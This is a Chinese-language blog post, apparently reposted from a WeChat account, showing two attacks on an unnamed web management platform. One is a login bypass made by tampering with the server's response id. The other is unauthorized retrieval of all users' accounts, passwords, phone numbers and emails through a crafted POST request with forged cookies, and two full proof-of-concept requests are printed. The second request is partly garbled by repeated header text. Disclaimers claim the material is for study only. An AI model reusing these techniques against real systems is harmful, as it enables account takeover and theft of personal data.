一.背景
今天给大家分享两个漏洞。一个绕过登陆。一个未授权查看平台信息
一.过程
具体咋搜不透露了,师傅都懂老规矩,我只教技巧。我们直接废话不多说直接上图
先上绕过登陆
随意输入密码抓包,并看返回包
假设id为0是错误 (随便乱输入的自然是错误密码)接下来我们改变一下返回包id的0为1以上 (大于0就可以了)
改好以后放包 发现可以直接登陆后台 可以看到已经绕过登陆了。右上角不显示管理员名字了。可以确实判断为未授权上去的
第二个未授权查看用户信息
构造符合条件的cookie+url路径进行post提交,直接未授权查看该管理平台的所有用户信息,比如账号密码,手机号邮箱等信息。构造数据包如下。
poc
POST /SystemManage/GetUserManageInitData HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestOrigin: xxx.xxx.xxx.xxxDNT: 1Connection: closeReferer: http:// xxx.xxx.xxx.xxx/center?url=users/userMgr.htmlCookie: SECKEY_ABVK=ZBFuZh0weeQvMVpz+e/gBmproRgvA6f97/e4r/0+1Qo%3D; dt_manage_navigation_cookie=6; BMAP_SECKEY=hjpRW0cV7rDcRkr6goXs740aSfCWD75pw4O3SwzNGFYWm0vcYM6OK3o0uQCXMR-K1viQCvdnuJVd1ZM5HoEk1oRPMr89oiqmROPTrfzfVCG4Ae9mnlRxiAa82jlVgTPMSaJnIZcajiJkg74PMn97_0JwfUjpH0Gk0E7nbOLflU-DxDk1_fqamFwpsCGKyZdz; PowerCode=1331506c786100152c553750fdcbe6ec; UserName=ssssss; Nickname=ssssss; jsonUser=%7B%22ID%22%3A526%2C%22NickName%22%3A%22ssssss%22%2C%22UserName%22%3A%22ssssss%22%2C%22PowerCode%22%3A%221331506c786100152c553750fdcbe6ec%22%2C%22CompanyID%22%3A10352%7DContent-Length: 0
poc
POST /SystemManage/GetUserManageInitData HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateFirefox/97.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestOrigin: http://xxxxDNT: 1Connection: closeReferer: http://xxxx/center?url=users/userMgr.htmlCookie: SECKEY_ABVK=ZBFuZh0weeQvMVpz+e/gBmproRgvA6f97/e4r/0+1Qo%3D; dt_manage_navigation_cookie=6; BMAP_SECKEY=hjpRW0cV7rDcRkr6goXs740aSfCWD75pw4O3SwzNGFYWm0vcYM6OK3o0uQCXMR-K1viQCvdnuJVd1ZM5HoEk1oRPMr89oiqmROPTrfzfVCG4Ae9mnlRxiAa82jlVgTPMSaJnIZcajiJkg74PMn97_0JwfUjpH0Gk0E7nbOLflU-DxDk1_fqamFwpsCGKyZdz; PowerCode=1331506c786100152c553750fdcbe6ec; UserName=ssssss; Nickname=ssssss; jsonUser=%7B%22ID%22%3A526%2C%22NickName%22%3A%22ssssss%22%2C%22UserName%22%3A%22ssssss%22%2C%22PowerCode%22%3A%221331506c786100152c553750fdcbe6ec%22%2C%22CompanyID%22%3A10352%7DContent-Length: 0
觉得好看的师傅们请给个关注呗。如果想要进去请公众号回复加群即可
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考
我不会渗透,我们下次再见!
原文始发于微信公众号(深夜笔记本):一次性挖两个洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论